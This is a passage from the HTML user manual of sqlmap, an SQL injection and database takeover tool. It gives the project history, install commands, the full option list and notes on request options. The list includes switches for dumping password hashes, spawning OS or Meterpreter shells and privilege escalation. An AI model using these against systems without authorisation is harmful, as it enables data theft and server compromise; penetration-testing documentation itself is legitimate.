<A HREF="http://bernardodamele.blogspot.com/2009/12/sqlmap-state-of-art-3-years-later.html">sqlmap state of art - 3 years later</A> highlighting the goals
|
|
achieved during these first three years of the project and launches a call
|
|
for developers.
|
|
</LI>
|
|
<LI><B>December 4</B>, sqlmap-devel mailing list has been merged into
|
|
sqlmap-users
|
|
<A HREF="http://www.sqlmap.org/#ml">mailing list</A>.
|
|
</LI>
|
|
<LI><B>November 20</B>, Bernardo and Guido present again their
|
|
research on stealth database server takeover at CONfidence 2009 in Warsaw,
|
|
Poland.
|
|
</LI>
|
|
<LI><B>September 26</B>, sqlmap version <B>0.8 release candidate
|
|
1</B> goes public on the
|
|
<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">subversion repository</A>, with all the attack
|
|
vectors unveiled at SOURCE Barcelona 2009 Conference. These include an
|
|
enhanced version of the Microsoft SQL Server buffer overflow exploit to
|
|
automatically bypass DEP memory protection, support to establish the
|
|
out-of-band connection with the database server by executing in-memory
|
|
the Metasploit shellcode via UDF <EM>sys_bineval()</EM> (anti-forensics
|
|
technique), support to access the Windows registry hives and support to
|
|
inject custom user-defined functions.
|
|
</LI>
|
|
<LI><B>September 21</B>, Bernardo and
|
|
<A HREF="http://www.pornosecurity.org">Guido Landi</A>
|
|
<A HREF="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule">present</A>
|
|
their research (
|
|
<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">slides</A>)
|
|
at SOURCE Conference 2009 in Barcelona, Spain.
|
|
</LI>
|
|
<LI><B>August</B>, Bernardo is accepted as a speaker at two others IT
|
|
security conferences,
|
|
<A HREF="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009">SOURCE Barcelona 2009</A> and
|
|
<A HREF="http://200902.confidence.org.pl/">CONfidence 2009 Warsaw</A>.
|
|
This new research is titled <EM>Expanding the control over the operating
|
|
system from the database</EM>.
|
|
</LI>
|
|
<LI><B>July 25</B>, stable version of sqlmap <B>0.7</B> is out!
|
|
</LI>
|
|
<LI><B>June 27</B>, Bernardo
|
|
<A HREF="http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated">presents</A>
|
|
an updated version of his
|
|
<EM>SQL injection: Not only AND 1=1</EM> slides at
|
|
<A HREF="http://www.digitalsecurityforum.eu/">2nd Digital Security Forum</A> in
|
|
Lisbon, Portugal.
|
|
</LI>
|
|
<LI><B>June 2</B>, sqlmap version <B>0.6.4</B> has made its way to
|
|
the official Ubuntu repository too.
|
|
</LI>
|
|
<LI><B>May</B>, Bernardo presents again his research on operating
|
|
system takeover via SQL injection at
|
|
<A HREF="http://www.owasp.org/index.php/OWASP_AppSec_Europe_2009_-_Poland">OWASP AppSec Europe 2009</A> in Warsaw, Poland and at
|
|
<A HREF="http://eusecwest.com/">EUSecWest 2009</A> in London, UK.
|
|
</LI>
|
|
<LI><B>May 8</B>, sqlmap version <B>0.6.4</B> has been officially
|
|
accepted in Debian repository. Details on
|
|
<A HREF="http://bernardodamele.blogspot.com/2009/05/sqlmap-in-debian-package-repository.html">this blog post</A>.
|
|
</LI>
|
|
<LI><B>April 22</B>, sqlmap version <B>0.7 release candidate 1</B>
|
|
goes public, with all the attack vectors unveiled at Black Hat Europe 2009
|
|
Conference.
|
|
These include execution of arbitrary commands on the underlying operating
|
|
system, full integration with Metasploit to establish an out-of-band
|
|
TCP connection, first publicly available exploit for Microsoft Security
|
|
Bulletin
|
|
<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS09-004.mspx">MS09-004</A> against Microsoft SQL Server 2000 and 2005 and others
|
|
attacks to takeover the database server as a whole, not only the data from
|
|
the database.
|
|
</LI>
|
|
<LI><B>April 16</B>, Bernardo
|
|
<A HREF="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-archives.html#Damele">presents</A> his research (
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides">slides</A>,
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">whitepaper</A>) at Black Hat Europe 2009 in Amsterdam, The Netherlands.
|
|
The feedback from the audience is good and there has been some
|
|
<A HREF="http://bernardodamele.blogspot.com/2009/03/black-hat-europe-2009.html">media coverage</A> too.
|
|
</LI>
|
|
<LI><B>March 5</B>, Bernardo
|
|
<A HREF="http://www.slideshare.net/inquis/sql-injection-not-only-and-11">presents</A> for the first time some of the sqlmap recent features and
|
|
upcoming enhancements at an international event,
|
|
<A HREF="http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009">Front Range OWASP Conference 2009</A> in Denver, USA. The presentation
|
|
is titled <EM>SQL injection: Not only AND 1=1</EM>.
|
|
</LI>
|
|
<LI><B>February 24</B>, Bernardo is accepted as a
|
|
<A HREF="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele">speaker</A> at
|
|
<A HREF="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-main.html">Black Hat Europe 2009</A> with a presentation titled <EM>Advanced SQL
|
|
injection exploitation to operating system full control</EM>.
|
|
</LI>
|
|
<LI><B>February 3</B>, sqlmap <B>0.6.4</B> is the last point release
|
|
for 0.6: taking advantage of the stacked queries test implemented in 0.6.3,
|
|
sqlmap can now be used to execute any arbitrary SQL statement, not only
|
|
<EM>SELECT</EM> anymore. Also, many features have been stabilized, tweaked
|
|
and improved in terms of speed in this release.
|
|
</LI>
|
|
<LI><B>January 9</B>, Bernardo
|
|
<A HREF="http://www.slideshare.net/inquis/sql-injection-exploitation-internals-presentation">presents</A> <EM>SQL injection exploitation internals</EM> at a
|
|
private event in London, UK.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<H2><A NAME="ss3.4">3.4</A> <A HREF="#toc3.4">2008</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>December 18</B>, sqlmap <B>0.6.3</B> is released featuring
|
|
support to retrieve targets from Burp and WebScarab proxies log files,
|
|
support to test for stacked queries ant time-based blind SQL injection,
|
|
rough fingerprint of the web server and web application technologies in
|
|
use and more options to customize the HTTP requests and enumerate more
|
|
information from the database.
|
|
</LI>
|
|
<LI><B>November 2</B>, sqlmap version <B>0.6.2</B> is a "bug fixes"
|
|
release only.
|
|
</LI>
|
|
<LI><B>October 20</B>, sqlmap first point release, <B>0.6.1</B>, goes
|
|
public. This includes minor bug fixes and the first contact between the
|
|
tool and
|
|
<A HREF="http://metasploit.com">Metasploit</A>:
|
|
an auxiliary module to launch sqlmap from within Metasploit Framework.
|
|
The
|
|
<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">subversion development repository</A> goes public again.
|
|
</LI>
|
|
<LI><B>September 1</B>, nearly one year after the previous release,
|
|
sqlmap <B>0.6</B> comes to life featuring a complete code
|
|
refactoring, support to execute arbitrary SQL <EM>SELECT</EM> statements,
|
|
more options to enumerate and dump specific information are added, brand
|
|
new installation packages for Debian, Red Hat, Windows and much more.
|
|
</LI>
|
|
<LI><B>August</B>, two public
|
|
<A HREF="http://www.sqlmap.org/#ml">mailing lists</A> are created on SourceForge.
|
|
</LI>
|
|
<LI><B>January</B>, sqlmap subversion development repository is moved
|
|
away from SourceForge and goes private for a while.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<H2><A NAME="ss3.5">3.5</A> <A HREF="#toc3.5">2007</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>November 4</B>, release <B>0.5</B> marks the end of the OWASP
|
|
Spring of Code 2007 contest participation. Bernardo has
|
|
<A HREF="http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page">accomplished</A> all the propsed objects which include also initial
|
|
support for Oracle, enhanced support for UNION query SQL injection and
|
|
support to test and exploit SQL injections in HTTP Cookie and User-Agent
|
|
headers.
|
|
</LI>
|
|
<LI><B>June 15</B>, Bernardo releases version <B>0.4</B> as a
|
|
result of the first OWASP Spring of Code 2007 milestone. This release
|
|
features, amongst others, improvements to the DBMS fingerprint engine,
|
|
support to calculate the estimated time of arrival, options to enumerate
|
|
specific data from the database server and brand new logging system.
|
|
</LI>
|
|
<LI><B>April</B>, even though sqlmap was <B>not</B> and is <B>not</B>
|
|
an OWASP project, it gets
|
|
<A HREF="http://www.owasp.org/index.php/SpoC_007_-_SqlMap">accepted</A>, amongst many other open source projects to OWASP Spring
|
|
of Code 2007.
|
|
</LI>
|
|
<LI><B>March 30</B>, Bernardo applies to OWASP
|
|
<A HREF="http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap">Spring of Code 2007</A>.
|
|
</LI>
|
|
<LI><B>January 20</B>, sqlmap version <B>0.3</B> is released,
|
|
featuring initial support for Microsoft SQL Server, support to test
|
|
and exploit UNION query SQL injections and injection points in POST
|
|
parameters.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<H2><A NAME="ss3.6">3.6</A> <A HREF="#toc3.6">2006</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>December 13</B>, Bernardo releases version <B>0.2</B> with
|
|
major enhancements to the DBMS fingerprint functionalities and replacement
|
|
of the old inference algorithm with the bisection algorithm.
|
|
</LI>
|
|
<LI><B>September</B>, Daniele leaves the project,
|
|
<A HREF="http://bernardodamele.blogspot.com">Bernardo Damele A. G.</A>
|
|
takes it over.
|
|
</LI>
|
|
<LI><B>August</B>, Daniele adds initial support for PostgreSQL and releases
|
|
version <B>0.1</B>.
|
|
</LI>
|
|
<LI><B>July 25</B>,
|
|
<A HREF="http://dbellucci.blogspot.com">Daniele Bellucci</A>
|
|
registers the sqlmap project on SourceForge and develops it on the
|
|
<A HREF="http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/">SourceForge subversion repository</A>. The skeleton is implemented and
|
|
limited support for MySQL added.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="s4">4.</A> <A HREF="#toc4">Download and update</A></H2>
|
|
|
|
<P>sqlmap can be downloaded from its
|
|
<A HREF="http://sourceforge.net/projects/sqlmap/files/">SourceForge File List page</A>.
|
|
It is available in two formats:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>
|
|
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz">Source gzip compressed</A>.
|
|
</LI>
|
|
<LI>
|
|
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.zip">Source zip compressed</A>.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>You can also checkout the latest development version from the
|
|
<A HREF="https://github.com/sqlmapproject/sqlmap">git</A>
|
|
repository:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>You can update it at any time to the latest development version by running:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py --update
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
<P>Or:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ git pull
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>This is strongly recommended <B>before</B> reporting any bug to the
|
|
<A HREF="http://www.sqlmap.org/#ml">mailing list</A>.</P>
|
|
|
|
|
|
<H2><A NAME="s5">5.</A> <A HREF="#toc5">Usage</A></H2>
|
|
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
$ python sqlmap.py -h
|
|
|
|
sqlmap/1.0 - automatic SQL injection and database takeover tool
|
|
http://www.sqlmap.org
|
|
|
|
Usage: python sqlmap.py [options]
|
|
|
|
Options:
|
|
--version show program's version number and exit
|
|
-h, --help show this help message and exit
|
|
-v VERBOSE Verbosity level: 0-6 (default 1)
|
|
|
|
Target:
|
|
At least one of these options has to be specified to set the source to
|
|
get target urls from.
|
|
|
|
-d DIRECT Direct connection to the database
|
|
-u URL, --url=URL Target url
|
|
-l LIST Parse targets from Burp or WebScarab proxy logs
|
|
-r REQUESTFILE Load HTTP request from a file
|
|
-g GOOGLEDORK Process Google dork results as target urls
|
|
-c CONFIGFILE Load options from a configuration INI file
|
|
|
|
Request:
|
|
These options can be used to specify how to connect to the target url.
|
|
|
|
--data=DATA Data string to be sent through POST
|
|
--cookie=COOKIE HTTP Cookie header
|
|
--cookie-urlencode URL Encode generated cookie injections
|
|
--drop-set-cookie Ignore Set-Cookie header from response
|
|
--user-agent=AGENT HTTP User-Agent header
|
|
--random-agent Use randomly selected HTTP User-Agent header
|
|
--referer=REFERER HTTP Referer header
|
|
--headers=HEADERS Extra HTTP headers newline separated
|
|
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
|
|
--auth-cred=ACRED HTTP authentication credentials (name:password)
|
|
--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
|
|
--proxy=PROXY Use a HTTP proxy to connect to the target url
|
|
--proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
|
|
--ignore-proxy Ignore system default HTTP proxy
|
|
--delay=DELAY Delay in seconds between each HTTP request
|
|
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
|
|
--retries=RETRIES Retries when the connection timeouts (default 3)
|
|
--scope=SCOPE Regexp to filter targets from provided proxy log
|
|
--safe-url=SAFURL Url address to visit frequently during testing
|
|
--safe-freq=SAFREQ Test requests between two visits to a given safe url
|
|
|
|
Optimization:
|
|
These options can be used to optimize the performance of sqlmap.
|
|
|
|
-o Turn on all optimization switches
|
|
--predict-output Predict common queries output
|
|
--keep-alive Use persistent HTTP(s) connections
|
|
--null-connection Retrieve page length without actual HTTP response body
|
|
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
|
|
|
|
Injection:
|
|
These options can be used to specify which parameters to test for,
|
|
provide custom injection payloads and optional tampering scripts.
|
|
|
|
-p TESTPARAMETER Testable parameter(s)
|
|
--dbms=DBMS Force back-end DBMS to this value
|
|
--os=OS Force back-end DBMS operating system to this value
|
|
--prefix=PREFIX Injection payload prefix string
|
|
--suffix=SUFFIX Injection payload suffix string
|
|
--tamper=TAMPER Use given script(s) for tampering injection data
|
|
|
|
Detection:
|
|
These options can be used to specify how to parse and compare page
|
|
content from HTTP responses when using blind SQL injection technique.
|
|
|
|
--level=LEVEL Level of tests to perform (1-5, default 1)
|
|
--risk=RISK Risk of tests to perform (0-3, default 1)
|
|
--string=STRING String to match in page when the query is valid
|
|
--regexp=REGEXP Regexp to match in page when the query is valid
|
|
--text-only Compare pages based only on the textual content
|
|
|
|
Techniques:
|
|
These options can be used to tweak testing of specific SQL injection
|
|
techniques.
|
|
|
|
--technique=TECH SQL injection techniques to test for (default BEUST)
|
|
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
|
|
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
|
|
--union-char=UCHAR Character to use for bruteforcing number of columns
|
|
|
|
Fingerprint:
|
|
-f, --fingerprint Perform an extensive DBMS version fingerprint
|
|
|
|
Enumeration:
|
|
These options can be used to enumerate the back-end database
|
|
management system information, structure and data contained in the
|
|
tables. Moreover you can run your own SQL statements.
|
|
|
|
-b, --banner Retrieve DBMS banner
|
|
--current-user Retrieve DBMS current user
|
|
--current-db Retrieve DBMS current database
|
|
--is-dba Detect if the DBMS current user is DBA
|
|
--users Enumerate DBMS users
|
|
--passwords Enumerate DBMS users password hashes
|
|
--privileges Enumerate DBMS users privileges
|
|
--roles Enumerate DBMS users roles
|
|
--dbs Enumerate DBMS databases
|
|
--tables Enumerate DBMS database tables
|
|
--columns Enumerate DBMS database table columns
|
|
--schema Enumerate DBMS schema
|
|
--count Retrieve number of entries for table(s)
|
|
--dump Dump DBMS database table entries
|
|
--dump-all Dump all DBMS databases tables entries
|
|
--search Search column(s), table(s) and/or database name(s)
|
|
-D DB DBMS database to enumerate
|
|
-T TBL DBMS database table to enumerate
|
|
-C COL DBMS database table column to enumerate
|
|
-U USER DBMS user to enumerate
|
|
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
|
|
--start=LIMITSTART First query output entry to retrieve
|
|
--stop=LIMITSTOP Last query output entry to retrieve
|
|
--first=FIRSTCHAR First query output word character to retrieve
|
|
--last=LASTCHAR Last query output word character to retrieve
|
|
--sql-query=QUERY SQL statement to be executed
|
|
--sql-shell Prompt for an interactive SQL shell
|
|
|
|
Brute force:
|
|
These options can be used to run brute force checks.
|
|
|
|
--common-tables Check existence of common tables
|
|
--common-columns Check existence of common columns
|
|
|
|
User-defined function injection:
|
|
These options can be used to create custom user-defined functions.
|
|
|
|
--udf-inject Inject custom user-defined functions
|
|
--shared-lib=SHLIB Local path of the shared library
|
|
|
|
File system access:
|
|
These options can be used to access the back-end database management
|
|
system underlying file system.
|
|
|
|
--file-read=RFILE Read a file from the back-end DBMS file system
|
|
--file-write=WFILE Write a local file on the back-end DBMS file system
|
|
--file-dest=DFILE Back-end DBMS absolute filepath to write to
|
|
|
|
Operating system access:
|
|
These options can be used to access the back-end database management
|
|
system underlying operating system.
|
|
|
|
--os-cmd=OSCMD Execute an operating system command
|
|
--os-shell Prompt for an interactive operating system shell
|
|
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
|
|
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
|
|
--os-bof Stored procedure buffer overflow exploitation
|
|
--priv-esc Database process' user privilege escalation
|
|
--msf-path=MSFPATH Local path where Metasploit Framework is installed
|
|
--tmp-path=TMPPATH Remote absolute path of temporary files directory
|
|
|
|
Windows registry access:
|
|
These options can be used to access the back-end database management
|
|
system Windows registry.
|
|
|
|
--reg-read Read a Windows registry key value
|
|
--reg-add Write a Windows registry key value data
|
|
--reg-del Delete a Windows registry key value
|
|
--reg-key=REGKEY Windows registry key
|
|
--reg-value=REGVAL Windows registry key value
|
|
--reg-data=REGDATA Windows registry key value data
|
|
--reg-type=REGTYPE Windows registry key value type
|
|
|
|
General:
|
|
These options can be used to set some general working parameters.
|
|
|
|
-t TRAFFICFILE Log all HTTP traffic into a textual file
|
|
-s SESSIONFILE Save and resume all data retrieved on a session file
|
|
--flush-session Flush session file for current target
|
|
--fresh-queries Ignores query results stored in session file
|
|
--eta Display for each output the estimated time of arrival
|
|
--update Update sqlmap
|
|
--save Save options on a configuration INI file
|
|
--batch Never ask for user input, use the default behaviour
|
|
|
|
Miscellaneous:
|
|
--beep Alert when sql injection found
|
|
--check-payload IDS detection testing of injection payloads
|
|
--cleanup Clean up the DBMS by sqlmap specific UDF and tables
|
|
--forms Parse and test forms on target url
|
|
--gpage=GOOGLEPAGE Use Google dork results from specified page number
|
|
--mobile Imitate smartphone through HTTP User-Agent header
|
|
--page-rank Display page rank (PR) for Google dork results
|
|
--parse-errors Parse DBMS error messages from response pages
|
|
--replicate Replicate dumped data into a sqlite3 database
|
|
--tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address
|
|
--wizard Simple wizard interface for beginner users
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="ss5.1">5.1</A> <A HREF="#toc5.1">Output verbosity</A>
|
|
</H2>
|
|
|
|
<P>Switch: <CODE>-v</CODE></P>
|
|
|
|
<P>This switch can be used to set the verbosity level of output messages.
|
|
There exist <B>seven</B> levels of verbosity.
|
|
The default level is <B>1</B> in which information, warning, error and
|
|
critical messages and Python tracebacks (if any occur) will be displayed.</P>
|
|
<P>
|
|
<UL>
|
|
<LI><B>0</B>: Show only Python tracebacks, error and critical messages.</LI>
|
|
<LI><B>1</B>: Show also information and warning messages.</LI>
|
|
<LI><B>2</B>: Show also debug messages.</LI>
|
|
<LI><B>3</B>: Show also payloads injected.</LI>
|
|
<LI><B>4</B>: Show also HTTP requests.</LI>
|
|
<LI><B>5</B>: Show also HTTP responses' headers.</LI>
|
|
<LI><B>6</B>: Show also HTTP responses' page content.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>A reasonable level of verbosity to further understand what sqlmap does
|
|
under the hood is level <B>2</B>, primarily for the detection phase and
|
|
the take-over functionalities. Whereas if you want to see the SQL payloads
|
|
the tools sends, level <B>3</B> is your best choice.
|
|
In order to further debug potential bugs or unexpected behaviours, we
|
|
recommend you to set the verbosity to level <B>4</B> or above. This
|
|
level is recommended to be used when you feed the developers with a bug
|
|
report too.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Target</A>
|
|
</H2>
|
|
|
|
<P>At least one of these options has to be provided.</P>
|
|
|
|
<H3>Target URL</H3>
|
|
|
|
<P>Switch: <CODE>-u</CODE> or <CODE>-</CODE><CODE>-url</CODE></P>
|
|
|
|
<P>Run sqlmap against a single target URL. This switch requires an argument
|
|
which is the target URL in the form <CODE>http(s)://targeturl[:port]/[...]</CODE>.</P>
|
|
|
|
<H3>Parse targets from Burp or WebScarab proxy logs</H3>
|
|
|
|
<P>Switch: <CODE>-l</CODE></P>
|
|
|
|
<P>Rather than providing a single target URL, it is possible to test and
|
|
inject against HTTP requests proxied through
|
|
<A HREF="http://portswigger.net/suite/">Burp proxy</A> or
|
|
<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A> This switch requires an argument which is the
|
|
proxy's HTTP requests log file.</P>
|
|
|
|
<H3>Load HTTP request from a file</H3>
|
|
|
|
<P>Switch: <CODE>-r</CODE></P>
|
|
|
|
<P>One of the possibilities of sqlmap is loading of complete HTTP request
|
|
from a textual file. That way you can skip usage of bunch of other
|
|
options (e.g. setting of cookies, POSTed data, etc).</P>
|
|
|
|
<P>Sample content of a HTTP request file provided as argument to this switch:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
POST /sqlmap/mysql/post_int.php HTTP/1.1
|
|
Host: 192.168.136.131
|
|
User-Agent: Mozilla/4.0
|
|
|
|
id=1
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<H3>Process Google dork results as target addresses</H3>
|
|
|
|
<P>Switch: <CODE>-g</CODE></P>
|
|
|
|
<P>It is also possible to test and inject on <CODE>GET</CODE> parameters on the
|
|
results of your Google dork.</P>
|
|
|
|
<P>This option makes sqlmap negotiate with the search engine its session
|
|
cookie to be able to perform a search, then sqlmap will retrieve Google
|
|
first 100 results for the Google dork expression with <CODE>GET</CODE>
|
|
parameters asking you if you want to test and inject on each possible
|
|
affected URL.</P>
|
|
|
|
<H3>Load options from a configuration INI file</H3>
|
|
|
|
<P>Switch: <CODE>-c</CODE></P>
|
|
|
|
<P>It is possible to pass user's options from a configuration INI file, an
|
|
example is <CODE>sqlmap.conf</CODE>.</P>
|
|
|
|
<P>Note that if you also provide other options from command line, those are
|
|
evaluated when running sqlmap and overwrite those provided in the
|
|
configuration file.</P>
|
|
|
|
|
|
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Request</A>
|
|
</H2>
|
|
|
|
<P>These options can be used to specify how to connect to the target url.</P>
|
|
|
|
<H3>HTTP data</H3>
|
|
|
|
<P>Option: <CODE>-</CODE><CODE>-data</CODE></P>
|
|
|
|
<P>By default the HTTP method used to perform HTTP requests is <CODE>GET</CODE>,
|
|
but you can implicitly change it to <CODE>POST</CODE> by providing the data to
|
|
be sent in the <CODE>POST</CODE> requests. Such data, being those parameters,
|
|
are tested for SQL injection as well as any provided <CODE>GET</CODE>
|
|
parameters.</P>
|
|
|
|
|
|
<H3>HTTP <CODE>Cookie</CODE> header</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-cookie</CODE>, <CODE>-</CODE><CODE>-drop-set-cookie</CODE>
|
|
and <CODE>-</CODE><CODE>-cookie-urlencode</CODE> </P>
|
|
|
|
<P>This feature can be useful in two ways:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>The web application requires authentication based upon cookies and
|
|
you have such data.</LI>
|
|
<LI>You want to detect and exploit SQL injection on such header values.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>Either reason brings you to need to send cookies with sqlmap requests, the
|
|
steps to go through are the following:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>Login to the application with your favourite browser.</LI>
|
|
<LI>Get the HTTP Cookie from the browser's preferences or from the HTTP
|
|
proxy screen and copy to the clipboard.</LI>
|
|
<LI>Go back to your shell and run sqlmap by pasting your clipboard as
|
|
the argument of the <CODE>-</CODE><CODE>-cookie</CODE> switch.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<P>Note that the HTTP <CODE>Cookie</CODE> header values are usually separated by
|
|
a <CODE>;</CODE> character, <B>not</B> by an <CODE>&</CODE>. sqlmap can
|
|
recognize these as separate sets of <CODE>parameter=value</CODE> too, as well
|
|
as GET and POST parameters.</P>
|
|
|
|
<P>If at any time during the communication, the web application responds with
|
|
<CODE>Set-Cookie</CODE> headers, sqlmap will automatically use its value in
|
|
all further HTTP requests as the <CODE>Cookie</CODE> header. sqlmap will also
|
|
automatically test those values for SQL injection. This can be avoided by
|
|
providing the switch <CODE>-</CODE><CODE>-drop-set-cookie</CODE> - sqlmap will
|
|
ignore any coming <CODE>Set-Cookie</CODE> header.</P>
|
|
|
|
<P>Vice versa, if you provide a HTTP <CODE>Cookie</CODE> header with
|
|
<CODE>-</CODE><CODE>-cookie</CODE> switch and the target URL sends an HTTP
|
|
<CODE>Set-Cookie</CODE> header at any time, sqlmap will ask you which set of
|
|
cookies to use for the following HTTP requests.</P>
|
|
|
|
<P>sqlmap by default does <B>not</B> URL-encode generated cookie payloads,
|
|
but you can force it by using the <CODE>-</CODE><CODE>-cookie-urlencode</CODE>
|
|
switch. Cookie content encoding is not declared by HTTP protocol standard
|
|
in any way, so it is solely the matter of web application's behaviour.</P>
|
|
|
|
<P>Note that also the HTTP <CODE>Cookie</CODE> header is tested against SQL
|
|
injection if the <CODE>-</CODE><CODE>-level</CODE> is set to <B>2</B> or above.
|
|
Read below for details.</P>
|
|
|
|
|
|
<H3>HTTP <CODE>User-Agent</CODE> header</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-user-agent</CODE> and <CODE>-</CODE><CODE>-random-agent</CODE></P>
|
|
|
|
<P>By default sqlmap performs HTTP requests with the following <CODE>User-Agent</CODE>
|
|
header value:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
sqlmap/0.9 (http://www.sqlmap.org)
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>However, it is possible to fake it with the <CODE>-</CODE><CODE>-user-agent</CODE>
|
|
switch by providing custom User-Agent as the switch argument.</P>
|
|
|
|
<P>Moreover, by providing the <CODE>-</CODE><CODE>-random-agent</CODE> switch, sqlmap
|
|
will randomly select a <CODE>User-Agent</CODE> from the <CODE>./txt/user-agents.txt</CODE>
|
|
textual file and use it for all HTTP requests within the session.</P>
|
|
|
|
<P>Some sites perform a server-side check on the HTTP <CODE>User-Agent</CODE>
|
|
header value and fail the HTTP response if a valid <CODE>User-Agent</CODE> is
|
|
not provided, its value is not expected or is blacklisted by a web
|
|
application firewall or similar intrusion prevention system. In this case
|
|
sqlmap will show you a message as follows:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to
|
|
force the HTTP User-Agent header with option --user-agent or --random-agent
|
|
</PRE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
|
|
<P>Note that also the HTTP <CODE>User-Agent</CODE> header is tested against SQL
|
|
injection if the <CODE>-</CODE><CODE>-level</CODE> is set to <B>3</B> or above.
|
|
Read below for details.</P>
|
|
|
|
|
|
<H3>HTTP <CODE>Referer</CODE> header</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-referer</CODE></P>
|
|
|
|
<P>It is possible to fake the HTTP <CODE>Referer</CODE> header value. By default
|
|
<B>no</B> HTTP <CODE>Referer</CODE> header is sent in HTTP requests if not
|
|
explicitly set.</P>
|
|
|
|
<P>Note that also the HTTP <CODE>Referer</CODE> header is tested against SQL
|
|
injection if the <CODE>-</CODE><CODE>-level</CODE> is set to <B>3</B> or above.
|
|
Read below for details.</P>
|
|
|
|
|
|
<H3>Extra HTTP headers</H3>
|
|
|
|
<P>Switch: <CODE>-</CODE><CODE>-headers</CODE></P>
|
|
|
|
<P>It is possible to provide extra HTTP headers by setting the
|
|
<CODE>-</CODE><CODE>-headers</CODE> switch. Each header must be separated by a
|
|
newline and it is much easier to provide them from the configuration INI
|
|
file. Have a look at the sample <CODE>sqlmap.conf</CODE> file for an example.</P>
|
|
|
|
|
|
<H3>HTTP protocol authentication</H3>
|
|
|
|
<P>Switches: <CODE>-</CODE><CODE>-auth-type</CODE> and <CODE>-</CODE><CODE>-auth-cred</CODE></P>
|
|
|
|
<P>These options can be used to specify which HTTP protocol authentication
|
|
the web server implements and the valid credentials to be used to perform
|
|
all HTTP requests to the target application.</P>
|
|
<P>The three supported HTTP protocol authentication mechanisms are:</P>
|
|
<P>
|
|
<UL>
|
|
<LI><CODE>Basic</CODE></LI>
|
|
<LI><CODE>Digest</CODE></LI>
|
|
<LI><CODE>NTLM</CODE></LI>
|
|
</UL>
|
|
</P>
|
|
<P>While the credentials' syntax is <CODE>username:password</CODE>.</P>
|
|
|
|
<P>Example of valid syntax:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<PRE>
|
|
